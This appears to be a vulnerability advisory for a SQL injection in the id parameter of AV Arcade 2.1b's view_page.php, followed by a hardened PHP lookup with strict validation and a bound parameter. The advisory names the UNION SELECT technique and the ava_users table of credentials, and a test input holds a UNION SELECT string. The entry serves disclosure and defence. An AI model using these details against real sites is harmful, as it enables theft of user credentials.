Vendor: AV Arcade
By: Kw3rLn
CVSS: 5.5 (MEDIUM)
SQL Injection
CWE: 89
Product Name: AV Arcade
Affected Version From: AV Arcade 2.1b
Affected Version To: AV Arcade 2.1b
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
AV Arcade 2.1b SQL Injection Vulnerability
The $id parameter of view_page.php is vulnerable to SQL injection. With a UNION SELECT statement, an attacker can retrieve the usernames and passwords of users from the ava_users table where the id is 1.
Mitigation:
Apply proper input validation and parameterized queries to prevent SQL injection attacks. Update to a patched version of AV Arcade if available.
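
A hardened form of the kind of id lookup described above, as an added example that is not AV Arcade's own code. The `pages` table, its columns and the function names are hypothetical, and an in-memory SQLite database with constructed rows stands in for the real one.

```php
<?php
declare(strict_types=1);
// Added example: strict id validation plus a bound parameter.
// Table, column and function names are hypothetical, not from AV Arcade.

function parse_page_id(mixed $raw): ?int
{
    // Accept only a canonical positive decimal integer of at most 9 digits.
    // Arrays (?id[]=1), signs, spaces, leading zeros and SQL text all fail.
    if (!is_string($raw) || !preg_match('/\A[1-9][0-9]{0,8}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function fetch_page(PDO $db, mixed $rawId): ?array
{
    $id = parse_page_id($rawId);
    if ($id === null) {
        return null; // reject before any SQL is built
    }
    // The query text is constant; the id travels separately as an integer.
    $stmt = $db->prepare('SELECT id, title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo database (stand-in for the application's real one).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false.
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO pages VALUES (1, 'About', 'Welcome')");

// Constructed inputs: one valid id, one unknown id, and malformed values.
$inputs = ['1', '2', '1 UNION SELECT 1,2,3', '01', '-1', ['1']];
foreach ($inputs as $input) {
    $page = fetch_page($db, $input);
    printf("%-28s => %s\n", json_encode($input), $page ? $page['title'] : 'rejected / not found');
}
```

Only the first input returns a row. The remaining values either fail validation or match no page, and none of them reaches the database as SQL text.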